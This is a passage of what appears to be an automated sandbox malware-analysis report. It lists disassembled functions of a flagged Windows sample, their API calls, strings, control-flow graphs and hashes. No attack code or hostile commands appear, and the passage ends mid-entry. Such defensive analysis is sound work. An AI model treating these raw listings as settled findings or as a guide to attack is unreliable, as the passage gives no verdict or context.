                                                                                                                                                                        • Instruction Fuzzy Hash: C1310870900209AFDF10CF95CD18BEEBBB4FB08714F104229E960B62D0DB799A48CFA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D11610 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 281threadsynchronizationCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2400 d11610-d11646 2401 d11676-d116ac CreateThread 2400->2401 2402 d11648-d1165b CreateEventW 2400->2402 2405 d116b2-d116c4 2401->2405 2406 d1178c-d117b7 WaitForSingleObject GetExitCodeThread 2401->2406 2403 d11669-d11671 2402->2403 2404 d1165d-d11666 2402->2404 2403->2401 2404->2403 2407 d11701-d1170a 2405->2407 2408 d116c6-d116cc 2405->2408 2409 d117c7-d117da 2406->2409 2410 d117b9-d117c0 CloseHandle 2406->2410 2411 d1170d-d1172a 2407->2411 2413 d116d0-d116d2 2408->2413 2410->2409 2414 d11770-d11786 call d7fa13 2411->2414 2415 d1172c 2411->2415 2416 d116d8-d116da 2413->2416 2417 d117dd-d11825 call bba850 2413->2417 2430 d11789 2414->2430 2419 d11730-d11732 2415->2419 2416->2417 2420 d116e0-d116fd 2416->2420 2427 d11835-d11855 call bbab90 2417->2427 2428 d11827-d1182c 2417->2428 2419->2417 2422 d11738-d1173a 2419->2422 2420->2413 2424 d116ff 2420->2424 2422->2417 2426 d11740-d11747 2422->2426 2424->2411 2426->2417 2429 d1174d-d11753 2426->2429 2434 d1193b-d1195d call bba850 2427->2434 2435 d1185b-d1186f 2427->2435 2428->2427 2429->2417 2432 d11759-d1176e 2429->2432 2430->2406 2432->2414 2432->2419 2443 d11968-d11974 2434->2443 2444 d1195f-d11962 WaitForSingleObject 2434->2444 2440 d118a1 2435->2440 2441 d11871-d11877 2435->2441 2442 d118a3-d118a8 call bba6d0 2440->2442 2445 d11887-d1188c 2441->2445 2446 d11879-d11885 call bba140 2441->2446 2455 d118ad-d118db call cccf10 2442->2455 2449 d11976-d11978 2443->2449 2450 d1199c-d119a6 2443->2450 2444->2443 2447 d11890-d11899 2445->2447 2446->2455 2447->2447 2452 d1189b-d1189f 2447->2452 2456 d119eb-d11a0d call bba850 call d11a20 2449->2456 2457 d1197a-d11980 2449->2457 2453 d119a8-d119aa 2450->2453 2454 d119cb-d119d1 2450->2454 2452->2442 2453->2456 2460 d119ac-d119b2 2453->2460 2470 d118e5-d118f3 call d67900 2455->2470 2471 d118dd-d118e0 2455->2471 2477 d11a1a-d11a1d 2456->2477 2478 d11a0f-d11a17 call d7fe78 2456->2478 2457->2456 2462 d11982-d1198c call cf1370 2457->2462 2460->2456 2465 d119b4-d119c4 call d117f0 2460->2465 2467 d11991-d11995 2462->2467 2472 d119d4-d119db 2465->2472 2479 d119c6-d119c9 2465->2479 2467->2472 2473 d11997-d1199a 2467->2473 2483 d118f5-d118f8 2470->2483 2484 d1191b 2470->2484 2471->2470 2472->2454 2480 d119dd-d119e8 2472->2480 2473->2449 2473->2450 2478->2477 2479->2453 2479->2454 2488 d11914-d11919 2483->2488 2489 d118fa-d11912 call d105c0 2483->2489 2485 d11920 call d105c0 2484->2485 2493 d11925-d11938 2485->2493 2488->2485 2489->2493
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,1FC3D414,00000000,?,?,?,?,?,?,?,00000000,00DF574D,000000FF), ref: 00D11650
                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00D11686
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00D1178F
                                                                                                                                                                        • GetExitCodeThread.KERNEL32(00000000,?), ref: 00D1179A
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D117BA
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateThread$AllocCloseCodeEventExitHandleHeapObjectSingleWait
                                                                                                                                                                        • String ID: <3
                                                                                                                                                                        • API String ID: 3988410809-878583566
                                                                                                                                                                        • Opcode ID: 106ffe673ffc59baea54eb482f0a20ef22d1308331a78d867597643896b812d8
                                                                                                                                                                        • Instruction ID: ae6c8a8a74b5f60369242809af6cc836cfbd25314a6bbe277a9f4fa644f37a00
                                                                                                                                                                        • Opcode Fuzzy Hash: 106ffe673ffc59baea54eb482f0a20ef22d1308331a78d867597643896b812d8
                                                                                                                                                                        • Instruction Fuzzy Hash: 0CB19279A00605EFDB14CF69D884BAAB7F4FF49310F144259E916AB791DB30E944CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CB4B90 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 253COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2496 cb4b90-cb4bec call cb4a80 call bbab90 2501 cb4cdd-cb4d54 call bba850 FreeLibrary EnterCriticalSection 2496->2501 2502 cb4bf2 2496->2502 2506 cb4d9e-cb4dbf LeaveCriticalSection 2501->2506 2507 cb4d56-cb4d5a 2501->2507 2504 cb4bf5-cb4c25 call bb9bb0 call ccc960 2502->2504 2540 cb4c5a-cb4c6a 2504->2540 2541 cb4c27-cb4c3e 2504->2541 2509 cb4dff-cb4e07 2506->2509 2510 cb4dc1-cb4dc5 2506->2510 2511 cb4d6c-cb4d6e 2507->2511 2512 cb4d5c-cb4d66 DestroyWindow 2507->2512 2516 cb4e09-cb4e0c 2509->2516 2517 cb4e33-cb4e41 2509->2517 2518 cb4dc7-cb4dd0 call d89d16 2510->2518 2519 cb4dd6-cb4ddb 2510->2519 2511->2506 2515 cb4d70-cb4d74 2511->2515 2512->2511 2521 cb4d76-cb4d7f call d89d16 2515->2521 2522 cb4d85-cb4d9b call d7fe78 2515->2522 2516->2517 2523 cb4e0e 2516->2523 2525 cb4e5d-cb4e71 call cb70e0 2517->2525 2526 cb4e43-cb4e47 2517->2526 2518->2519 2527 cb4ded-cb4dfc call d7fe78 2519->2527 2528 cb4ddd-cb4de6 call d89d16 2519->2528 2521->2522 2522->2506 2534 cb4e10-cb4e15 2523->2534 2551 cb4e79-cb4e8a 2525->2551 2552 cb4e73 2525->2552 2536 cb4e49-cb4e50 2526->2536 2537 cb4e56-cb4e5b 2526->2537 2527->2509 2528->2527 2546 cb4e1d-cb4e31 2534->2546 2547 cb4e17-cb4e19 2534->2547 2536->2537 2537->2525 2537->2526 2553 cb4c6c-cb4c70 2540->2553 2554 cb4cb0-cb4cbf 2540->2554 2549 cb4c48-cb4c52 call bbab90 2541->2549 2550 cb4c40-cb4c43 2541->2550 2546->2517 2546->2534 2547->2546 2549->2501 2565 cb4c58 2549->2565 2550->2549 2552->2551 2558 cb4ca2-cb4ca8 call bba6d0 2553->2558 2559 cb4c72-cb4c76 2553->2559 2556 cb4cc9-cb4cdc 2554->2556 2557 cb4cc1-cb4cc4 2554->2557 2557->2556 2564 cb4cad 2558->2564 2559->2558 2563 cb4c78-cb4c8e call bba380 2559->2563 2568 cb4c9b-cb4ca0 2563->2568 2569 cb4c90-cb4c98 2563->2569 2564->2554 2565->2504 2568->2564 2569->2568
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00CB4B90: GetModuleFileNameW.KERNEL32(00000000,?,00000104,1FC3D414,00000000,?,00DE3F86,000000FF), ref: 00CB4AD8
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000001,1FC3D414,?,00000001,?,?,?), ref: 00CB4D27
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00E9946C), ref: 00CB4D42
                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00CB4D60
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00E9946C), ref: 00CB4DA9
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalInit_thread_footerSection$DestroyEnterFileFreeHeapLeaveLibraryModuleNameProcessWindow
                                                                                                                                                                        • String ID: %s%lu$.local
                                                                                                                                                                        • API String ID: 3496055493-548699545
                                                                                                                                                                        • Opcode ID: 039914ef24603ec18370e9f9bccb53cb12991ff54d32670d69a3168940f89df5
                                                                                                                                                                        • Instruction ID: 287354ff57636f05e5cca635198b6c789bd4a58f109cebad614929a650f9700b
                                                                                                                                                                        • Opcode Fuzzy Hash: 039914ef24603ec18370e9f9bccb53cb12991ff54d32670d69a3168940f89df5
                                                                                                                                                                        • Instruction Fuzzy Hash: CF91FD71A052009FDB24DF69C844BAEFBF4FF04710F14856EE865AB392DB749904CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D100A0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187fileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2571 d100a0-d100eb call ccf280 2574 d100f7-d10105 2571->2574 2575 d100ed-d100f2 2571->2575 2577 d10110-d10131 2574->2577 2576 d102a1-d102cb call d80528 2575->2576 2579 d10133-d10139 2577->2579 2580 d1013b-d10152 SetFilePointer 2577->2580 2579->2580 2582 d10162-d10177 ReadFile 2580->2582 2583 d10154-d1015c GetLastError 2580->2583 2584 d1029c 2582->2584 2585 d1017d-d10184 2582->2585 2583->2582 2583->2584 2584->2576 2585->2584 2586 d1018a-d1019b 2585->2586 2586->2577 2587 d101a1-d101ad 2586->2587 2588 d101b0-d101b4 2587->2588 2589 d101c1-d101c5 2588->2589 2590 d101b6-d101bf 2588->2590 2591 d101c7-d101cd 2589->2591 2592 d101e8-d101ea 2589->2592 2590->2588 2590->2589 2591->2592 2594 d101cf-d101d2 2591->2594 2593 d101ed-d101ef 2592->2593 2595 d101f1-d101f4 2593->2595 2596 d10204-d10206 2593->2596 2597 d101e4-d101e6 2594->2597 2598 d101d4-d101da 2594->2598 2595->2587 2600 d101f6-d101ff 2595->2600 2601 d10216-d1023c SetFilePointer 2596->2601 2602 d10208-d10211 2596->2602 2597->2593 2598->2592 2599 d101dc-d101e2 2598->2599 2599->2592 2599->2597 2600->2577 2601->2584 2603 d1023e-d10253 ReadFile 2601->2603 2602->2577 2603->2584 2604 d10255-d10259 2603->2604 2604->2584 2605 d1025b-d10265 2604->2605 2606 d10267-d1026d 2605->2606 2607 d1027f-d10284 2605->2607 2606->2607 2608 d1026f-d10277 2606->2608 2607->2576 2608->2607 2609 d10279-d1027d 2608->2609 2609->2607 2610 d10286-d1029a 2609->2610 2610->2576
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointer.KERNEL32(00DF52BD,-00000400,?,00000002,00000400,1FC3D414,?,?,?), ref: 00D10146
                                                                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 00D10154
                                                                                                                                                                        • ReadFile.KERNEL32(00DF52BD,00000000,00000400,?,00000000,?,?), ref: 00D1016F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$ErrorLastPointerRead
                                                                                                                                                                        • String ID: ADVINSTSFX
                                                                                                                                                                        • API String ID: 64821003-4038163286
                                                                                                                                                                        • Opcode ID: b52f27caf1ccbc293b8e66b9e853fb5512ef91b7293e0584dbfcace23e689b0e
                                                                                                                                                                        • Instruction ID: 6801383ba1edb2786bad7320962f0f54de8fad2fded25a9898319c2a985952a9
                                                                                                                                                                        • Opcode Fuzzy Hash: b52f27caf1ccbc293b8e66b9e853fb5512ef91b7293e0584dbfcace23e689b0e
                                                                                                                                                                        • Instruction Fuzzy Hash: 2361B271A00209AFDB01DFA8D884BEEBBB5FF55314F284265E505E7280DBB49DC5CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD6B40 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180fileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2611 cd6b40-cd6b80 call cd1c70 2614 cd6d7b-cd6d83 call cd6e10 2611->2614 2615 cd6b86-cd6ba2 SHGetFolderPathW 2611->2615 2624 cd6d87-cd6da4 call d7fe6a 2614->2624 2616 cd6bae-cd6bbd 2615->2616 2617 cd6ba4-cd6bac 2615->2617 2619 cd6bbf 2616->2619 2620 cd6bd2-cd6be3 call cb1fc0 2616->2620 2617->2616 2617->2617 2622 cd6bc0-cd6bc8 2619->2622 2629 cd6be5 2620->2629 2630 cd6c07-cd6c49 call bc0ec0 call d821f0 call cbeab0 2620->2630 2622->2622 2625 cd6bca-cd6bcc 2622->2625 2625->2614 2625->2620 2631 cd6bf0-cd6bfc 2629->2631 2639 cd6c4d-cd6c75 GetTempFileNameW call bb8810 2630->2639 2640 cd6c4b 2630->2640 2631->2614 2634 cd6c02-cd6c05 2631->2634 2634->2630 2634->2631 2643 cd6c77-cd6c7d call d80528 2639->2643 2644 cd6c80-cd6c8f 2639->2644 2640->2639 2643->2644 2646 cd6c9b-cd6cc5 call d8052d 2644->2646 2647 cd6c91-cd6c99 2644->2647 2651 cd6cc7-cd6cd0 2646->2651 2652 cd6ce3-cd6d30 Wow64DisableWow64FsRedirection CopyFileW 2646->2652 2647->2646 2647->2647 2653 cd6cd2-cd6ce1 2651->2653 2654 cd6d3a-cd6d45 2652->2654 2655 cd6d32-cd6d35 call cd6e10 2652->2655 2653->2652 2653->2653 2657 cd6d67-cd6d79 call bb8810 2654->2657 2658 cd6d47-cd6d61 Wow64RevertWow64FsRedirection 2654->2658 2655->2654 2657->2624 2658->2657
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00CD1C70: __Init_thread_footer.LIBCMT ref: 00CD1D42
                                                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,1FC3D414,00000000,00000000,?), ref: 00CD6B95
                                                                                                                                                                        • GetTempFileNameW.KERNEL32(00000000,shim_clone,00000000,?), ref: 00CD6C5C
                                                                                                                                                                        • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00CD6CFF
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00CD6D21
                                                                                                                                                                        • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 00CD6D4D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Wow64$FileRedirection$CopyDisableFolderInit_thread_footerNamePathRevertTemp
                                                                                                                                                                        • String ID: shim_clone
                                                                                                                                                                        • API String ID: 1326775856-3944563459
                                                                                                                                                                        • Opcode ID: 653c4094afb4da9f62a663cc1feede0c4f9abc04328041c538edf4a20f625cca
                                                                                                                                                                        • Instruction ID: aae1239bccad07a15e20893fac8eb4b1752d1f9c2ea49708d1ce9de1f0565071
                                                                                                                                                                        • Opcode Fuzzy Hash: 653c4094afb4da9f62a663cc1feede0c4f9abc04328041c538edf4a20f625cca
                                                                                                                                                                        • Instruction Fuzzy Hash: 6A61E770A002589FDF24DB24CC45BA9B7F5EF54300F5440EAE646A7291DF749F89CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC8DA1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2661 bc8da1-bc8e29 2663 bc8e9f-bc8ea4 2661->2663 2664 bc8e2b-bc8e34 2661->2664 2665 bc8ecf-bc8edd 2663->2665 2666 bc8ea6-bc8ea8 2663->2666 2667 bc8e4c-bc8e7e GetWindowLongW CallWindowProcW 2664->2667 2668 bc8e36-bc8e4a CallWindowProcW 2664->2668 2666->2665 2671 bc8eaa-bc8ecc 2666->2671 2669 bc8e9b 2667->2669 2670 bc8e80-bc8e8b GetWindowLongW 2667->2670 2668->2663 2669->2663 2670->2669 2672 bc8e8d-bc8e95 SetWindowLongW 2670->2672 2672->2669
                                                                                                                                                                        APIs
                                                                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,00000024), ref: 00BC8E40
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000FC), ref: 00BC8E55
                                                                                                                                                                        • CallWindowProcW.USER32(?,?,00000082,?,00000024), ref: 00BC8E6B
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000FC), ref: 00BC8E85
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000FC,?), ref: 00BC8E95
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Long$CallProc
                                                                                                                                                                        • String ID: $
                                                                                                                                                                        • API String ID: 513923721-3993045852
                                                                                                                                                                        • Opcode ID: e46a205e4b90461dd34b47abebcb4d5ac570a5a34bb29431f7cae2412aa812f5
                                                                                                                                                                        • Instruction ID: 1145412834386629337e6837f4360416b0811ffaf93ef0702bb0c36c8b9f6ed1
                                                                                                                                                                        • Opcode Fuzzy Hash: e46a205e4b90461dd34b47abebcb4d5ac570a5a34bb29431f7cae2412aa812f5
                                                                                                                                                                        • Instruction Fuzzy Hash: 2641F271508701AFC720DF1AC884A5BBBF5FF88720F504A1EF5EA876A1D771E8488B51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CB8330 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96registrylibraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2674 cb8330-cb8367 2675 cb8369-cb836c 2674->2675 2676 cb83d2-cb83e9 RegCreateKeyExW 2674->2676 2677 cb836e-cb837b GetModuleHandleW 2675->2677 2678 cb83c5-cb83c9 2675->2678 2679 cb83ef-cb83f1 2676->2679 2680 cb837d-cb8393 2677->2680 2681 cb8396-cb83a4 GetProcAddress 2677->2681 2678->2676 2682 cb83cb-cb83d0 2678->2682 2683 cb83f3-cb83f9 2679->2683 2684 cb8414-cb8425 2679->2684 2681->2682 2685 cb83a6-cb83c3 2681->2685 2682->2679 2686 cb83fb-cb8402 RegCloseKey 2683->2686 2687 cb8404-cb8411 2683->2687 2685->2679 2686->2687 2687->2684
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Advapi32.dll,1FC3D414,00000000,?,?,?,00000000,00DA83F0,000000FF), ref: 00CB8373
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 00CB839C
                                                                                                                                                                        • RegCreateKeyExW.KERNEL32(?,00CCA4EF,00000000,00000000,00000000,00DA83F0,00000000,00000000,00DA83F0,1FC3D414,00000000,?,?,?,00000000,00DA83F0), ref: 00CB83E9
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00DA83F0,000000FF), ref: 00CB83FC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressCloseCreateHandleModuleProc
                                                                                                                                                                        • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                                                                                        • API String ID: 1765684683-2994018265
                                                                                                                                                                        • Opcode ID: 8a7a95a236dcf9f700e18e0161a3aaec301cc89214146357e2dfedbcf6bb9183
                                                                                                                                                                        • Instruction ID: ff128cd9940c39e5c46d52131d90dbbd3aec1c3ea42157ae45434932c69ef6c2
                                                                                                                                                                        • Opcode Fuzzy Hash: 8a7a95a236dcf9f700e18e0161a3aaec301cc89214146357e2dfedbcf6bb9183
                                                                                                                                                                        • Instruction Fuzzy Hash: B5318472644215EFEB108F45DC45FABBBACFB08B50F10412AF915E72D0EB71A914CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CEE3F0 Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00CEE410
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00CEE426
                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,00CF5F2A,?,?,?,?,?,?), ref: 00CEE43F
                                                                                                                                                                        • InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,00CF5F2A,?,?), ref: 00CEE44A
                                                                                                                                                                        • GetDlgItem.USER32(00000000,000003E9), ref: 00CEE45C
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00CEE472
                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,?,?,?,00CF5F2A), ref: 00CEE4B5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Rect$Item$InvalidateShow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2147159307-0
                                                                                                                                                                        • Opcode ID: 44f5066f7f2bfb3dd0dfb45878ce3861dbe45c1fc0ff59f6e037fa46542ca18f
